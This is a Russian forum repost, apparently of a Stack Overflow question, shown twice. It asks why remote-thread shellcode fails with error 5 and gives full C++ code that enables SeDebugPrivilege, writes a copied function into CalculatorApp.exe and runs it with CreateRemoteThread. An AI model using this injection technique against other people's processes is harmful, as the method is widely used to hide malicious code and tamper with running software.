Мобильная версияCreateRemoteThread() завершается с ошибкой 5 при вызове inject_param->allocate() в inject_begin(). Прокомментируйте это, и CreateRemoteThread() будет в порядке. Я не знаю, почему. Целевая платформа — 64-разрядная.
#include
#include
#include
std::uint32_t get_process_id(
__in const std::basic_string& name) {
PROCESSENTRY32 process_entry;
process_entry.dwSize = sizeof(PROCESSENTRY32);
auto process_snapshot = ::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
if (Process32First(process_snapshot, &process_entry))
{
do {
if (!wcscmp(process_entry.szExeFile, name.data()))
{
CloseHandle(process_snapshot);
return process_entry.th32ProcessID;
}
} while (Process32Next(process_snapshot, &process_entry));
}
CloseHandle(process_snapshot);
return 0;
}
void adjust_token_privileges() {
HANDLE h_token = NULL;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &h_token))
{
return;
}
TOKEN_PRIVILEGES priv = { 0 };
priv.PrivilegeCount = 1;
priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &priv.Privileges[0].Luid))
{
AdjustTokenPrivileges(h_token, FALSE, &priv, 0, NULL, NULL);
}
CloseHandle(h_token);
}
typedef NTSTATUS(WINAPI* NTALLOCATEVIRTUALMEMORY)(IN HANDLE ProcessHandle, IN OUT PVOID* BaseAddress, IN ULONG ZeroBits, IN OUT PSIZE_T RegionSize, IN ULONG AllocationType, IN ULONG Protect);
struct InjectParam {
int age;
NTALLOCATEVIRTUALMEMORY allocate;
};
//shell code
ULONG_PTR WINAPI inject_begin(InjectParam* inject_param) {
inject_param->age += 1;//age=2
PVOID memory_address = NULL;
SIZE_T size = 10;
//comment it CreateRemoteThread is ok
inject_param->allocate((HANDLE)-1, &memory_address, 0, &size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
return 0;
}
void inject_end() {
printf("11");
}
void remote_map_load_dll(HANDLE target_process)
{
InjectParam inject_param;
//将指定内存区域的内容清零
RtlZeroMemory(&inject_param, sizeof(inject_param));
inject_param.age = 1;
//-------------------------------
WORD* shell_code_begin = (WORD*)inject_begin;
DWORD shell_code_size = 0;
while (*shell_code_begin != 0XCCCC)
{
shell_code_begin++;
shell_code_size += 2;
}
printf("shellcode length:%d\n", shell_code_size);
PVOID shell_code_buffer = malloc(shell_code_size);
RtlCopyMemory(shell_code_buffer, inject_begin, shell_code_size);
//-------------------------------
//获取本进程的 ntdll.dll
HMODULE h_nt_dll = GetModuleHandleA("ntdll.dll");
inject_param.allocate = (NTALLOCATEVIRTUALMEMORY)GetProcAddress(h_nt_dll, "NtAllocateVirtualMemory");
printf("NtAllocateVirtualMemory address :0x%p\r\n", inject_param.allocate);
//-------------------------------
PBYTE shellcode_address = (PBYTE)VirtualAllocEx(target_process, 0, shell_code_size + sizeof(inject_param), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
// printf("shellcode_address:0x%p\r\n", shellcode_address);
//-------------------------------write shell code
SIZE_T dw_writed = 0;
PBYTE shell_code_address = shellcode_address;
printf("shell_code_address:0X%p\r\n", shell_code_address);
WriteProcessMemory(target_process, shell_code_address, shell_code_buffer, shell_code_size, &dw_writed);
printf("write ShellCodeAddress bytes:%d\r\n", dw_writed);
//------------------------------- write InjectParam
PBYTE inject_param_address = shellcode_address + shell_code_size;
printf("InjectParamAddress:0X%p\r\n", inject_param_address);
BOOL result = WriteProcessMemory(target_process, (LPVOID)inject_param_address, &inject_param, sizeof(inject_param), &dw_writed);
printf("write InjectParamAddress bytes:%d\r\n", dw_writed);
//-------------------------------
HANDLE remote_thread = CreateRemoteThread(target_process, 0, 0, (LPTHREAD_START_ROUTINE)shell_code_address, inject_param_address, 0, 0);
printf("remote_thread:0x%X\n", remote_thread);
if (remote_thread)
{
WaitForSingleObject(remote_thread, -1);
//ERROR_ACCESS_DENIED=0x5
DWORD exit_code = 0;
GetExitCodeThread(remote_thread, &exit_code);
printf("error:0x%x\n", exit_code);
//释放申请的内存
VirtualFreeEx(target_process, shellcode_address, 0, MEM_FREE);
CloseHandle(remote_thread);
}
//free
free(shell_code_buffer);
}
int main() {
int result = EXIT_SUCCESS;
//
adjust_token_privileges();
//get dwmpid
auto dwm_pid = get_process_id(L"CalculatorApp.exe");
auto h_handle = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, dwm_pid);
printf("dwmpid:%d\r\n", dwm_pid);
//
remote_map_load_dll(h_handle);
CloseHandle(h_handle);
system("pause");
return result;
}
Подробнее здесь: https://stackoverflow.com/questions/792 ... d-failed-5
CreateRemoteThread не удалось 5 ⇐ C++
Программы на C++. Форум разработчиков
1733610719
Anonymous
CreateRemoteThread() завершается с ошибкой 5 при вызове inject_param->allocate() в inject_begin(). Прокомментируйте это, и CreateRemoteThread() будет в порядке. Я не знаю, почему. Целевая платформа — 64-разрядная.
#include
#include
#include
std::uint32_t get_process_id(
__in const std::basic_string& name) {
PROCESSENTRY32 process_entry;
process_entry.dwSize = sizeof(PROCESSENTRY32);
auto process_snapshot = ::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
if (Process32First(process_snapshot, &process_entry))
{
do {
if (!wcscmp(process_entry.szExeFile, name.data()))
{
CloseHandle(process_snapshot);
return process_entry.th32ProcessID;
}
} while (Process32Next(process_snapshot, &process_entry));
}
CloseHandle(process_snapshot);
return 0;
}
void adjust_token_privileges() {
HANDLE h_token = NULL;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &h_token))
{
return;
}
TOKEN_PRIVILEGES priv = { 0 };
priv.PrivilegeCount = 1;
priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &priv.Privileges[0].Luid))
{
AdjustTokenPrivileges(h_token, FALSE, &priv, 0, NULL, NULL);
}
CloseHandle(h_token);
}
typedef NTSTATUS(WINAPI* NTALLOCATEVIRTUALMEMORY)(IN HANDLE ProcessHandle, IN OUT PVOID* BaseAddress, IN ULONG ZeroBits, IN OUT PSIZE_T RegionSize, IN ULONG AllocationType, IN ULONG Protect);
struct InjectParam {
int age;
NTALLOCATEVIRTUALMEMORY allocate;
};
//shell code
ULONG_PTR WINAPI inject_begin(InjectParam* inject_param) {
inject_param->age += 1;//age=2
PVOID memory_address = NULL;
SIZE_T size = 10;
//comment it CreateRemoteThread is ok
inject_param->allocate((HANDLE)-1, &memory_address, 0, &size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
return 0;
}
void inject_end() {
printf("11");
}
void remote_map_load_dll(HANDLE target_process)
{
InjectParam inject_param;
//将指定内存区域的内容清零
RtlZeroMemory(&inject_param, sizeof(inject_param));
inject_param.age = 1;
//-------------------------------
WORD* shell_code_begin = (WORD*)inject_begin;
DWORD shell_code_size = 0;
while (*shell_code_begin != 0XCCCC)
{
shell_code_begin++;
shell_code_size += 2;
}
printf("shellcode length:%d\n", shell_code_size);
PVOID shell_code_buffer = malloc(shell_code_size);
RtlCopyMemory(shell_code_buffer, inject_begin, shell_code_size);
//-------------------------------
//获取本进程的 ntdll.dll
HMODULE h_nt_dll = GetModuleHandleA("ntdll.dll");
inject_param.allocate = (NTALLOCATEVIRTUALMEMORY)GetProcAddress(h_nt_dll, "NtAllocateVirtualMemory");
printf("NtAllocateVirtualMemory address :0x%p\r\n", inject_param.allocate);
//-------------------------------
PBYTE shellcode_address = (PBYTE)VirtualAllocEx(target_process, 0, shell_code_size + sizeof(inject_param), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
// printf("shellcode_address:0x%p\r\n", shellcode_address);
//-------------------------------write shell code
SIZE_T dw_writed = 0;
PBYTE shell_code_address = shellcode_address;
printf("shell_code_address:0X%p\r\n", shell_code_address);
WriteProcessMemory(target_process, shell_code_address, shell_code_buffer, shell_code_size, &dw_writed);
printf("write ShellCodeAddress bytes:%d\r\n", dw_writed);
//------------------------------- write InjectParam
PBYTE inject_param_address = shellcode_address + shell_code_size;
printf("InjectParamAddress:0X%p\r\n", inject_param_address);
BOOL result = WriteProcessMemory(target_process, (LPVOID)inject_param_address, &inject_param, sizeof(inject_param), &dw_writed);
printf("write InjectParamAddress bytes:%d\r\n", dw_writed);
//-------------------------------
HANDLE remote_thread = CreateRemoteThread(target_process, 0, 0, (LPTHREAD_START_ROUTINE)shell_code_address, inject_param_address, 0, 0);
printf("remote_thread:0x%X\n", remote_thread);
if (remote_thread)
{
WaitForSingleObject(remote_thread, -1);
//ERROR_ACCESS_DENIED=0x5
DWORD exit_code = 0;
GetExitCodeThread(remote_thread, &exit_code);
printf("error:0x%x\n", exit_code);
//释放申请的内存
VirtualFreeEx(target_process, shellcode_address, 0, MEM_FREE);
CloseHandle(remote_thread);
}
//free
free(shell_code_buffer);
}
int main() {
int result = EXIT_SUCCESS;
//
adjust_token_privileges();
//get dwmpid
auto dwm_pid = get_process_id(L"CalculatorApp.exe");
auto h_handle = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, dwm_pid);
printf("dwmpid:%d\r\n", dwm_pid);
//
remote_map_load_dll(h_handle);
CloseHandle(h_handle);
system("pause");
return result;
}
Подробнее здесь: [url]https://stackoverflow.com/questions/79260174/createremotethread-failed-5[/url]
Ответить
1 сообщение
• Страница 1 из 1
Перейти
- Кемерово-IT
- ↳ Javascript
- ↳ C#
- ↳ JAVA
- ↳ Elasticsearch aggregation
- ↳ Python
- ↳ Php
- ↳ Android
- ↳ Html
- ↳ Jquery
- ↳ C++
- ↳ IOS
- ↳ CSS
- ↳ Excel
- ↳ Linux
- ↳ Apache
- ↳ MySql
- Детский мир
- Для души
- ↳ Музыкальные инструменты даром
- ↳ Печатная продукция даром
- Внешняя красота и здоровье
- ↳ Одежда и обувь для взрослых даром
- ↳ Товары для здоровья
- ↳ Физкультура и спорт
- Техника - даром!
- ↳ Автомобилистам
- ↳ Компьютерная техника
- ↳ Плиты: газовые и электрические
- ↳ Холодильники
- ↳ Стиральные машины
- ↳ Телевизоры
- ↳ Телефоны, смартфоны, плашеты
- ↳ Швейные машинки
- ↳ Прочая электроника и техника
- ↳ Фототехника
- Ремонт и интерьер
- ↳ Стройматериалы, инструмент
- ↳ Мебель и предметы интерьера даром
- ↳ Cантехника
- Другие темы
- ↳ Разное даром
- ↳ Давай меняться!
- ↳ Отдам\возьму за копеечку
- ↳ Работа и подработка в Кемерове
- ↳ Давай с тобой поговорим...
